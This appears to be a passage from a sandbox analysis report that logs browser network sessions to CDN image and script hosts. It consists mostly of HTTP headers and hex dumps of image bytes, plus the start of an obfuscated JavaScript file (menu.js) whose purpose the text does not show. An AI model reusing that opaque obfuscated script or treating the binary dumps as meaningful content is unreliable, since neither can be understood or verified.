                                                                                                                                                          X-CCDN-Expires: 2464134
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC13380INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          412192.168.2.55018190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC376OUTGET /pc/image-pc/index/367/mask_sport.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 663866
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Feb 2023 04:41:55 GMT
                                                                                                                                                          ETag: "63e32813-a213a"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[2],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE9[19],EU-GER-frankfurt-GLOBAL1-CACHE8[0,TCP_HIT,17],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1419431
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 7913e1d66b0b1c87773d61285ba3125a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1172574
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC15756INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 06 08 06 00 00 00 27 b2 43 a7 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 87 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR'CtEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:4
                                                                                                                                                          2024-06-09 22:41:13 UTC16384INData Raw: a7 f3 9c 83 af 6f 1a 43 d8 5e eb 29 29 18 57 08 87 a2 c2 12 dc 58 e4 26 10 5c 53 fc dc 21 2d 1a 25 96 3f 2f 7b 12 27 5c ca b4 57 0f f1 eb 95 26 38 35 17 0c f6 77 24 4b 5e a9 d6 39 1b 35 fa eb e2 79 e7 4f 7d a7 fb 9f 69 9d 9c c7 d1 df 78 c1 78 fd a6 a4 ea 6d d4 24 11 2b 9b c9 5f 73 f9 86 91 f2 df f7 f4 9c 72 84 83 55 58 79 a2 c0 b6 8b d6 c1 61 0b 98 e2 b3 df ab 13 57 b1 c4 20 3d 28 6e e8 c6 8f 3f 6e ce 4d 3a 7d 02 bd 7a ac 0a 7d c4 aa ad 34 ac b9 0d cc 31 1e 71 4a a1 6a d6 a3 68 d3 bb 72 5b f5 c4 4b 29 f0 3a 0a 1a 4a 2e f4 57 25 5c f0 ae 15 80 3c d7 41 47 06 bb ae 42 4d 27 f0 04 a7 e6 65 20 51 fa 01 45 7f 55 8c f3 22 f4 84 67 42 c4 62 5b 35 d8 ec 73 c7 6f 21 e9 01 a9 a2 2b e1 83 76 ef 7a d6 ea 5f 14 e7 b0 18 ce 55 5d 77 0b 02 51 5c 09 04 02 81 40 08 2c 81
                                                                                                                                                          Data Ascii: oC^))WX&\S!-%?/{'\W&85w$K^95yO}ixxm$+_srUXyaW =(n?nM:}z}41qJjhr[K):J.W%\<AGBM'e QEU"gBb[5so!+vz_U]wQ\@,
                                                                                                                                                          2024-06-09 22:41:13 UTC16384INData Raw: 3b ca ef bf b9 99 8a c3 1e 95 3d c1 80 4d 6c c0 78 bc 62 65 b2 e2 f6 f6 b7 e8 99 de de c4 fc fe 23 da ab 1c 98 76 6e 7d 7d 3d 9f cf 8d bb c9 e7 e4 2d 28 2c d1 cb ca 4a 7e ff ee 96 79 06 be e8 d5 e0 2b ce cf a6 b4 f7 56 57 47 3d 7f 22 7e 29 0a e8 26 b7 f8 ea ea 8a d6 f1 e6 c6 06 dd 0f 02 fb 64 0d e2 ad 27 27 17 6e 6b 6b c3 85 ae 4d 6a 2b b8 c2 8b 3b ea de ca 3f bb bc bc 25 c1 ff 8d 8d 35 1a 4b 1d 93 2f 3e 90 d7 3a 4f 57 23 5b 95 ff 7d 7a 76 e9 26 e3 b1 9b ac 8c e9 bb 8f 4f 4e e9 3e 8c c7 23 3e e7 fc bc ce f2 6b 36 37 37 c5 a7 86 45 90 61 ce c6 16 f7 75 3a 9d bb 93 d3 53 77 f0 61 87 a6 fd 34 40 b1 f8 4f de 9f a9 32 73 88 85 d7 95 bd c6 fb ce d7 c2 46 94 e0 2b ea f9 bb 72 9f da e4 53 cd aa 05 49 53 49 dc d5 1f d9 44 7d 96 ed 25 01 99 25 50 6c c1 d4 94 d4 b7
                                                                                                                                                          Data Ascii: ;=Mlxbe#vn}}=-(,J~y+VWG="~)&d''nkkMj+;?%5K/>:OW#[}zv&ON>#>k677Eau:Swa4@O2sF+rSISID}%%Pl
                                                                                                                                                          2024-06-09 22:41:13 UTC16384INData Raw: d7 32 9d 93 d1 46 29 df 2f da 8f ba 23 67 22 a9 82 6b 5c 23 91 f5 63 02 ef 37 37 d7 e9 ba 50 f4 d8 20 06 5c 27 76 35 19 76 98 23 fd 3f b4 8c f3 ed f6 25 a6 a7 49 f0 93 49 13 b4 68 01 a4 b4 aa 13 70 7a 4b 43 c3 90 0f 46 d7 4e 69 f4 a1 c6 3f 9a 6f 94 c2 8f da 4d 89 d3 c0 66 87 56 2f 8a c6 f0 6d 44 0c 50 fd b1 a6 70 ef 8d 9e 98 5f 82 ee bc 8f c3 ba 1b c4 0f 36 1f a2 75 39 57 66 26 eb 8c a1 68 06 20 6b 7d 6d 5c 06 32 20 d8 e9 3a 63 67 4d b1 4d 8b 9b e5 39 b9 96 a9 af 9d 5e d6 07 80 4d a9 c5 3d 9d 5e aa 03 0f 8a 7e 64 ea 15 d3 e2 af 71 3f ff 78 00 2b f9 3b d0 5e d3 63 d4 d1 88 e8 48 4e 02 d5 e1 fe 24 09 1c d0 40 01 20 c4 2d 53 ab 55 3c bb 54 f5 52 13 85 7a d7 0a 00 6a 4b 06 8c b5 22 f7 c4 58 8a 5c 0d 80 d1 02 bb e9 f6 96 2b 21 40 de 61 b8 31 0d ea fb e5 21 19
                                                                                                                                                          Data Ascii: 2F)/#g"k\#c77P \'v5v#?%IIhpzKCFNi?oMfV/mDPp_6u9Wf&h k}m\2 :cgMM9^M=^~dq?x+;^cHN$@ -SU<TRzjK"X\+!@a1!
                                                                                                                                                          2024-06-09 22:41:13 UTC16384INData Raw: f3 19 2c 42 c2 b9 aa a2 21 44 5b 60 4c 07 ac 66 7b 92 9e 91 0b 36 66 0e 8b d9 0c 66 e1 39 83 90 b0 0e c2 b5 c1 aa 5a bb 7a f7 53 00 59 8a 99 82 eb 72 f3 2e dd a1 d2 0c 16 44 0a b1 4b 5c e7 47 85 46 9f 80 4c 75 1d df eb e0 e0 80 d6 70 6a 75 56 c5 82 b6 46 9b dc 9f db db 7b ba e7 f8 05 37 39 31 ee 76 a3 ed f4 2d 21 d9 b7 6f cf e8 e7 fb fb 59 f4 0f 1d 9b 00 b5 bb bb 7b 62 b1 e0 fe a2 f7 48 da 5b b9 80 a0 5b 52 d1 66 1e 85 a4 5b 0f 2d 48 fb 0e d6 87 0c a0 2f c3 60 1a 03 62 dc e3 75 a7 06 dd d2 b3 27 05 3c 23 38 e5 ea b9 73 79 08 0a 82 3b b8 7e a6 34 b5 d9 26 06 f9 c7 8f 9f 54 11 21 fe 2c ab 5b 6c 2b fd ad 52 08 25 64 5d 2d 4c c0 30 d6 c0 7b 87 37 09 6d 1a 25 61 90 8b 61 9d e0 eb 31 71 ba 0b 3e 16 81 2e 8e 99 e1 36 9c cf 28 ac 6b f4 e5 49 fc d7 f9 35 76 80 dc
                                                                                                                                                          Data Ascii: ,B!D[`Lf{6ff9ZzSYr.DK\GFLupjuVF{791v-!oY{bH[[Rf[-H/`bu'<#8sy;~4&T!,[l+R%d]-L0{7m%aa1q>.6(kI5v
                                                                                                                                                          2024-06-09 22:41:13 UTC16384INData Raw: b4 4f ef 37 53 d7 76 f0 c8 86 49 e1 0e 16 12 d2 89 8f 61 6a 91 ea 73 94 6a a8 5f 1b 94 61 95 e4 37 8e dd c6 bf bf 29 b5 3b 74 65 a1 65 e3 14 ce 47 22 87 a6 d5 bd 67 78 c2 0f b2 5d 8a 89 f4 26 df bb 83 83 61 9a 30 07 e4 d4 de 15 c2 a2 72 4c 0c 1e b2 33 f0 e9 ba 1b a5 9b 95 f4 8b 54 a0 92 f4 b7 2c 57 53 a1 3d d1 23 f6 8d 93 3e ca 5f b7 b4 49 ea 90 69 fc fe fb 39 03 13 4a 63 43 5f 10 ef d7 82 a1 7e bf a6 35 8a 8c bc c3 f0 b9 d0 60 e0 f7 08 8e f4 ba 22 86 6e 69 44 2e b6 64 8c 0e 3b 0c b0 d4 f0 5f ff db 3f c0 6d 99 20 ea 96 49 f9 19 1d d0 c5 c5 98 d6 25 3a e1 ba 2e c5 ce 75 bc 8e 55 33 bc ce 8d 53 ba 43 ae c5 42 2a 92 f4 f8 3c ac b4 a5 fb 13 be de 0d de 16 ac 30 6a 37 39 ca f7 93 92 9a f0 5e 38 f2 dd 6c d2 66 f6 25 ab 4c 5e a3 2b 91 d8 92 d9 a3 c4 3f 4e ac 8c
                                                                                                                                                          Data Ascii: O7SvIajsj_a7);teeG"gx]&a0rL3T,WS=#>_Ii9JcC_~5`"niD.d;_?m I%:.uU3SCB*<0j79^8lf%L^+?N
                                                                                                                                                          2024-06-09 22:41:13 UTC16384INData Raw: 95 35 96 a8 5e f2 ad 69 31 77 13 8e 93 93 63 ba 99 4c 78 61 df 1f f4 f8 77 83 e1 90 6e c6 d7 ec d7 e3 cc d8 dc 64 0c 7d d0 d2 3e ef e2 f2 92 63 8d 75 28 87 e3 cf dc 67 e2 02 be 54 bb 7b 43 d7 98 fd 2e 66 e8 c0 40 82 c1 a4 d6 c4 d4 27 a4 2c cd d8 e7 c3 11 72 45 8c 0d 07 91 85 d7 03 b9 c5 93 77 a8 71 e6 1d 26 43 ce cf 2f ed ef 07 f6 33 ba 44 43 10 25 d8 a5 5e 35 a3 d7 b4 e7 3d 44 f6 f6 46 7c 3c 28 7f c4 a2 33 4a 1e 7d 07 f0 9a 16 78 4d 35 a2 da 72 fe d2 f2 86 32 cd 78 7a 28 ab 46 3b 8e cc e9 79 0f 1f b4 a5 34 a9 32 4c 20 06 3f 33 9d a9 1c e6 3e 9e 67 3a 5b f0 f5 fb e1 87 63 ba ba 76 66 ff 68 9f 78 3c da 3d 08 ca 6e af 1b eb 2b 6a 93 8c d6 cf cf ce 98 68 cc 77 b8 40 5e a2 34 15 0a 41 a4 0a 86 94 9c fc b3 3a b2 0d 49 86 65 9c 0c e1 7e db dd db 8f 9d 3c 48 4b
                                                                                                                                                          Data Ascii: 5^i1wcLxawnd}>cu(gT{C.f@',rEwq&C/3DC%^5=DF|<(3J}xM5r2xz(F;y42L ?3>g:[cvfhx<=n+jhw@^4A:Ie~<HK
                                                                                                                                                          2024-06-09 22:41:13 UTC16384INData Raw: df b1 8e bc c8 b9 3d 93 e9 94 30 0c 60 0b 8f c1 3a 00 9a 90 b1 05 9d 9d 9e 12 88 01 4e dd 3f 3c f0 fe 1d 83 e4 4b 3a b3 b0 5e 38 ac 58 fe 68 96 99 cd 67 1c 11 40 31 80 36 80 2f 08 65 8c 17 97 17 92 98 df 37 e6 35 a1 03 22 b6 05 db 17 39 07 97 4a a5 52 a9 54 5f b2 14 60 a9 54 2a 95 4a a5 52 7d e1 ca b6 1b 79 fd ea 95 6c d6 6b 19 0f 86 16 5a 04 22 bd 56 4b 76 e6 be 30 89 59 b2 86 5c a5 c9 64 2a c7 e3 1e 9d 58 db ed 4e aa ba 94 24 b5 8e 22 40 8c 12 e0 26 08 a4 aa 0a c9 f3 42 3a ad b6 59 46 64 7e ff 5e 86 67 cf 25 ed 7c c1 fd e8 0e 80 95 35 0d 55 ee e7 fa c3 c5 0e 20 15 80 0f 03 d5 e1 5c cb 73 de 8e db 00 f6 72 f3 05 50 04 10 c5 bc b0 30 a4 cb 09 8e 27 38 98 7a db 9e 19 df 1d 41 10 5c 4c 00 45 91 59 f7 d1 d1 d8 76 0d 3c 3b e7 fa b0 7e 64 55 f9 b2 43 c0 a3 57
                                                                                                                                                          Data Ascii: =0`:N?<K:^8Xhg@16/e75"9JRT_`T*JR}ylkZ"VKv0Y\d*XN$"@&B:YFd~^g%|5U \srP0'8zA\LEYv<;~dUCW
                                                                                                                                                          2024-06-09 22:41:13 UTC16384INData Raw: 23 33 d6 01 cb 22 3d 1c aa dd 0b b5 e3 60 33 a2 ca a2 24 64 c3 6b c7 e4 16 eb 03 dc 40 a6 d7 d9 99 99 e8 76 7b 2c 35 f9 54 13 6b ec 93 28 b2 9d ef 6c a9 9f dd a6 50 3e 30 5c 1d 3c a4 de b7 1b 6c 26 7e fb bc 2b bf 2f 70 fc e4 3e 1f 2b 0c 1a 17 11 81 4e 5d 30 ed 0c 41 c6 28 83 79 2a b3 30 ec 27 c0 cb a1 99 b0 d2 69 c8 40 e7 ba 71 5e ed 97 b3 2e 42 1f 9c 8f 43 b6 0a ec 79 82 ce 9f 7e 5d a1 83 5a 0a b0 be 5e ad 97 0b 59 af 56 04 17 70 e7 b5 db 2d 42 c9 8e b9 16 21 c7 08 d7 bd d7 7f f9 b3 7c ff c3 0f 3c 66 26 0f 0f 5c 0e 40 63 bb db f1 18 78 76 71 21 ed 4e 97 e0 42 f5 59 09 96 fb a0 26 b4 ae 5d 3a 90 13 7e 20 f3 6b 00 0b 6e 29 5c 3f 09 a3 b1 8c 39 5f e1 2e c5 29 9b c4 36 df 6e bb db 4a 52 a5 bc 26 e2 43 1c 5c 0f 50 5a 08 50 dd ea b4 25 36 3f 97 2e e4 71 7e ff
                                                                                                                                                          Data Ascii: #3"=`3$dk@v{,5Tk(lP>0\<l&~+/p>+N]0A(y*0'i@q^.BCy~]Z^YVp-B!|<f&\@cxvq!NBY&]:~ kn)\?9_.)6nJR&C\PZP%6?.q~
                                                                                                                                                          2024-06-09 22:41:13 UTC16384INData Raw: fb 2a 23 10 15 cb 66 bd 6d 59 5a 35 7d 96 52 4a 5e c8 50 72 4d 13 99 50 e6 81 44 83 f0 24 a5 77 14 8a 3e 3e 9b 2d 1b c0 e1 68 24 5f 7f f9 05 19 04 60 20 55 47 d7 58 e4 2a e7 a1 a7 15 1a bb 3c a7 e7 cb 7e b3 91 89 6b 0e bd 71 b8 67 ed f0 aa 3a 1a 49 f7 b8 71 f6 eb 9a b5 24 cd 09 50 2c 97 4b 99 2f 16 04 0c c0 b2 e8 f5 14 b0 02 88 b5 73 4d e8 7c b1 72 af 39 26 98 30 b9 be d6 44 42 f3 e6 02 78 54 d7 a5 a6 8e 01 5c ab 4e 72 38 09 4d 80 27 a3 81 1c 5c b3 0b 40 03 00 1c 64 63 90 21 41 96 d4 ed 00 5c bc 53 2f 2d 36 49 07 32 d8 9a c6 3c 5b cc 43 ca 4b 3d 31 e6 48 18 c4 f8 20 31 0d 8f a7 e0 97 fa 27 e1 f9 ec 5c b3 36 bd fd c7 cc 80 24 ef b6 46 f1 9a 2a a8 12 9b cc 7c c7 f8 f8 17 66 eb 9e ed e1 d7 0b c1 4d f3 b9 ba 94 98 46 ed 3c 29 e0 a5 98 68 63 3f 8b f5 f7 7f 83
                                                                                                                                                          Data Ascii: *#fmYZ5}RJ^PrMPD$w>>-h$_` UGX*<~kqg:Iq$P,K/sM|r9&0DBxT\Nr8M'\@dc!A\S/-6I2<[CK=1H 1'\6$F*|fMF<)hc?


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          413192.168.2.55018090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC557OUTGET /pc/240516-03/static/js/components/383/menu.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2224
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:40 GMT
                                                                                                                                                          ETag: "6645cac0-8b0"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE3[3],EU-FRA-paris-GLOBAL1-CACHE22[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467545
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6697d4dbe4fa3a32180b3069f5dbe3c5
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124455
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC2224INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 42 67 45 35 38 42 64 41 47 67 47 38 41 54 41 54 77 67 41 73 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 30 37 4a 6f 79 49 41 4a 51 55 41 52 4b 79 51 67 41 42 45 6b 34 41 6e 62 6c 33 45 42 75 41 50 4a 67 41 56 69 43 34 41 36 4b 69 47 62 63 30 49 41 41 6f 4b 55 45 45 41 73 34 31 4d 51 38 51 48 30 6e 49 4a 41 46 6b 55 56 56 67 42 73 51 34 79 67 41 33 4b 42 39 57 45 45 59 41 51 6e 77 41 58 78 46 56 59 49 55 5a 4b 41 42 65 45 45 78 78 66 42 67 49 5a 6e 45 52 4d 6d 35 6b 69 68 67 55 41 46 73 49 64 42 41 30 54 69 52 47 43 68 4c 4b 31 67 42 6c 56 6a 41 57 64 69 35 65 4e 45 77 78 42 52 42 4f 56 67 55 30 47 52 41 39 4e 4e 77 41 5a 6b 6d 52 50 55
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABgE58BdAGgG8ATATwgAsAuAMwFc0YAXAS3U07JoyIAJQUARKyQgABEk4Anbl3EBuAPJgAViC4A6KiGbc0IAAoKUEEAs41MQ8QH0nIJAFkUVVgBsQ4ygA3KB9WEEYAQnwAXxFVYIUZKABeEExxfBgIZnERMm5kihgUAFsIdBA0TiRGChLK1gBlVjAWdi5eNEwxBRBOVgU0GRA9NNwAZkmRPU


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          414192.168.2.55017990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC643OUTGET /pc/image-pc/nav/ico_arrow_down.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 202
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 05 Jul 2019 07:58:30 GMT
                                                                                                                                                          ETag: "5d1f0326-ca"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[4],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE14[2],EU-FRA-paris-GLOBAL1-CACHE14[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465108
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f865bd3c5ab77e0ed43d9cb1a638aa45
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126892
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC202INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0c 00 00 00 06 08 06 00 00 00 f7 ee 7f 81 00 00 00 91 49 44 41 54 28 53 63 d4 34 34 6e 62 64 64 30 fa f5 e9 63 f0 9d 3b 77 7e 32 60 01 c6 c6 c6 5c df ff 31 6c fe cf c0 70 94 11 24 af 65 68 5c c7 c0 c8 60 c6 c9 c8 10 76 f6 ec d9 6f c8 7a 40 8a bf fd 63 d8 ca c0 c0 70 f8 fa f9 b3 75 60 0d 70 4d 0c 0c f6 9c 4c 0c be 30 4d 5a 5a 5a 3c 0c ec 9c 3b fe 33 30 ec 03 29 06 a9 83 6b 40 d2 e4 c6 f0 f3 bb 07 d8 14 34 c5 18 1a 50 34 31 30 30 20 9b 0c 73 09 8a 0d c8 ce fb cf c0 c0 02 73 06 b2 9f 00 1b a4 38 16 ca 89 1e 2d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDRIDAT(Sc44nbdd0c;w~2`\1lp$eh\`voz@cpu`pML0MZZZ<;30)k@4P4100 ss8-IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          415192.168.2.55017890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC651OUTGET /pc/image-pc/index/312/new_service_icon.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1243
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:55 GMT
                                                                                                                                                          ETag: "5d71fe87-4db"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE21[3],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465108
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5ecb2e4d5487009cc422937c52b087a9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126892
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
